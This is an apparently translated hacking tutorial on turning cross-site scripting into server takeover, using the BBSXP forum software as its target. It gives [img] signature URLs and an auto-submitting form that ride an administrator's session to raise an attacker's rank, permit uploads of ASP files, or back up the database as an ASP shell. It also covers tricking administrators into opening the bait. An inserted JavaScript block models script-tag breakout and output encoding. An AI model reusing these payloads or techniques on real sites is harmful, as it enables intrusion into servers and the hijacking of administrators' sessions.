XSS Cross-Site Scripting

Source: Internet
Author: User

1. What is an XSS attack?

XSS, also written CSS (Cross Site Script) in older material, is a cross-site scripting attack: a malicious attacker inserts HTML or script code into a web page, and when a user browses that page the embedded code runs in the user's browser, achieving whatever the attacker intended. XSS is a passive attack, and because it is passive and awkward to exploit, many people dismiss it as being of little value. This article mainly describes how to use XSS to obtain a shell on the target server. The technique is old, but I hope the ideas behind it are useful to everyone.

How to find XSS vulnerabilities

Personally, I divide XSS attacks into two types. The first is the internal attack, which mainly means using a vulnerability in the target program itself to construct cross-site statements, for example the cross-site vulnerability in DVBBS's showerror.asp. The second is the external attack, which mainly means constructing our own web page containing a cross-site statement, or finding a page with a cross-site vulnerability on a machine other than the target. For example, when we want to penetrate a website, we build a page carrying a cross-site payload and then, combined with other techniques such as social engineering, trick the administrator of the target server into opening it.

Then the technique described below is used to obtain a shell.

How to exploit it

In the traditional exploitation method, the attacker constructs a cross-site page, places a cookie-collecting page in some other web space, and then uses other techniques to get users to open the cross-site page so that their cookies are stolen for further attacks. I personally think this method is outdated, and you probably know its disadvantages: even after collecting cookies you may not be able to penetrate any further, because the passwords in most cookies are encrypted or hashed, and cookie spoofing is subject to further conditions of its own. The idea proposed in this article solves these problems to some extent. In my view a mature method is to construct a form through the cross-site vulnerability, where the form's content uses the program's backup function, or adds an administrator, in order to obtain high privileges. This technique is described in detail below.

2. Internal cross-site attacks

Search for Cross-Site Vulnerabilities

If we have the source code this is easy: we mainly read the code to check whether the places that accept user input, and the variables they feed, enforce a length limit and filter characters such as "<", ">" and ";". Pay attention to whether tags are closed. For example, when testing for a cross-site vulnerability in a QQ group, entering <script>alert('test')</script> in the title does not execute, because another tag in the page source, such as an earlier <script>, has not yet been closed at the point where the title is inserted. Closing it first makes the code run: entering </script><script>alert('test')</script> in the title pops up the test box.
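
The tag-closing behaviour just described, as an added example that is not code from the original article: a constructed page template interpolates the title inside a <script> element that is still open, and a small scanner applies the one HTML tokenizer rule that matters here, namely that a script element's body ends at the first "</script" the tokenizer meets. It also shows two encoders, the usual HTML-entity one and a JavaScript-string one, and checks which of the resulting script bodies would actually parse and run. The template, the placeholder TITLE_HERE and the function names are assumptions of this example.

```javascript
// Added example, not code from the original article: a small model of the
// tag-closing behaviour described above. A constructed template interpolates
// the title inside a <script> element that is still open, and the scanner
// applies the one HTML tokenizer rule that matters here: a script element's
// body ends at the first "</script" the tokenizer meets, whatever came before.

// Constructed template standing in for the vulnerable page.
const TEMPLATE = '<html><body><script>var title = "TITLE_HERE";</script>' +
                 '<div id="t"></div></body></html>';

// Vulnerable rendering: the title goes into the page as-is.
function renderTitle(title) {
  return TEMPLATE.replace('TITLE_HERE', title);
}

// HTML-entity encoding of the five characters that matter in text and
// attribute context. It is not the right encoder for a JavaScript string,
// but it does guarantee that "</script" can never appear in the output.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Correct encoder for the JavaScript-string context this template uses:
// JSON.stringify handles quotes and backslashes, and "<" / ">" are written
// as \u003c / \u003e so that "</script" cannot appear either.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c').replace(/>/g, '\\u003e');
}

// Rendering with the JS-context encoder (the quotes come from the encoder).
function renderTitleJs(title) {
  return TEMPLATE.replace('"TITLE_HERE"', jsStringLiteral(title));
}

// Body of every <script> element, found the way the tokenizer finds them:
// after "<script ...>" everything up to the next "</script" is script data.
function scriptBodies(html) {
  const bodies = [];
  const lower = html.toLowerCase();
  let pos = 0;
  for (;;) {
    const open = lower.indexOf('<script', pos);
    if (open === -1) break;
    const gt = lower.indexOf('>', open);
    if (gt === -1) break;
    const close = lower.indexOf('</script', gt + 1);
    bodies.push(html.slice(gt + 1, close === -1 ? html.length : close));
    if (close === -1) break;
    pos = close + '</script'.length;
  }
  return bodies;
}

// A script body only runs if it parses. new Function() compiles a body
// without executing it, which is exactly the question "would this run?".
function executableBodies(html) {
  return scriptBodies(html).filter(body => {
    try { new Function(body); return true; } catch (e) { return false; }
  });
}

// For the JS-context encoder we can go one step further: execute the single
// script body and return the value the page's own script sees in `title`.
function titleSeenByScript(html) {
  const bodies = executableBodies(html);
  if (bodies.length !== 1) return null;
  return new Function(bodies[0] + ' return title;')();
}

// Constructed inputs: the two titles from the text above.
const RAW_PAYLOAD = "<script>alert('test')</script>";
const CLOSING_PAYLOAD = "</script><script>alert('test')</script>";

// Stand-alone demonstration of which script bodies would run in each case.
for (const [label, html] of [
  ['raw payload', renderTitle(RAW_PAYLOAD)],
  ['closing payload', renderTitle(CLOSING_PAYLOAD)],
  ['closing payload, HTML-escaped', renderTitle(escapeHtml(CLOSING_PAYLOAD))],
  ['closing payload, JS-encoded', renderTitleJs(CLOSING_PAYLOAD)],
]) {
  console.log(label, '->', JSON.stringify(executableBodies(html)));
}
```

With the raw payload the only script body is the unterminated string `var title = "<script>alert('test')`, which does not parse, so nothing runs; with the closing payload the page yields two bodies and the second, `alert('test')`, parses and would run. Either encoder removes the breakout, but only the JS-string encoder leaves the page's own script seeing the original title value.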

How to exploit it

Taking BBSXP as an example. The process has been recorded as an animation; for details see the animation on the CD. Two exploitable cross-site vulnerabilities in BBSXP serve as the examples.

a. First register an ordinary user; the user I registered here is linzi. Then write the following in the personal signature:

[img]http://127.0.0.1/bbsxp/admin_user.asp?menu=userok&username=linzi&membercode=5&userlife=1&posttopic=3&money=9&postrevert=0&savemoney=0&deltopic=1&regtime=2005-9-1+1%3A1%3A1&experience=9&country=%D6%D0%B9%FA&&Submit=+%B8%FC+%D0%C2+[/img]

b. Then make a post, and use other techniques to trick the forum master into opening it.

c. Because this is a test, we log in as the administrator ourselves and open the post. We find that linzi has become a community chief engineer (membercode=5).

Second, it is enough to put the following in the personal signature and again make a post:

[img]http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|asp%20|rar[/img]

Once the administrator opens the post, an upload extension of "asp " (with a trailing space) is added. Then you only need to upload newmm.asp (with the trailing space) to get a shell.

The attacks above are more or less limited: although a shell can be obtained, the concealment is not very good, because the signature is limited in length and cannot exceed 255 characters. We can combine Flash with the cross-site attack to make it more concealed; for making Flash Trojans see the introduction written by fengchu. Use the following code to modify the profile picture URL:

admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|php|rar

The backup form shown in section 3 below backs up the forum database as shit.asp. The message board has the following cross-site statement:

Then trick the administrator into opening your profile or browsing your posts. When the administrator opens them, a new upload extension is added in the background automatically. BBSXP filters spaces and % in the profile picture URL, so here we can only add extensions that do not contain a space. Of course, you can also add the shtml extension; with it you can view source code and then carry out further attacks.


3. Cross-site attacks from outside

Sometimes, when we cannot find a usable cross-site vulnerability in the target program, we can start from the outside. Say what we need to take is its forum, and the forum's own security is very good, but its message board has a cross-site vulnerability. In that case we write the cross-site statement into the message board, and the cross-site statement is a form that submits a privilege-elevation request to the forum. The statements above target BBSXP's ASP pages. Of course, we can also use the back-end backup function to obtain a shell directly.

For example, first upload a file linzi.txt with the following content (the closing form tag and the script that submits the form as soon as the page loads complete the fragment as the text describes it):

    <body>
    <form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post">
    <input value="database/bbsxp.mdb" name="yl">
    <input value="database/shit.asp" name="bf">
    <input type="submit">
    </form>
    <script>document.forms[0].submit();</script>
    </body>

When the administrator opens the file, the form is submitted with the administrator's session, the database is backed up as shit.asp, and we have a shell.

4. What is the relationship between XSS and other technologies?

From the examples above we can see that tricking the administrator into opening the page is a very important step. Besides social engineering, we can combine it with other techniques such as SQL injection. When we penetrate a website whose main site has an MSSQL injection vulnerability with only public permission, we can use UPDATE to write cross-site statements into the database, for example an iframe that opens the backup page to obtain a shell. We can also use other cross-site vulnerabilities in QQ as part of the social engineering.

Deception is always an art. Use your imagination to make the most of it!
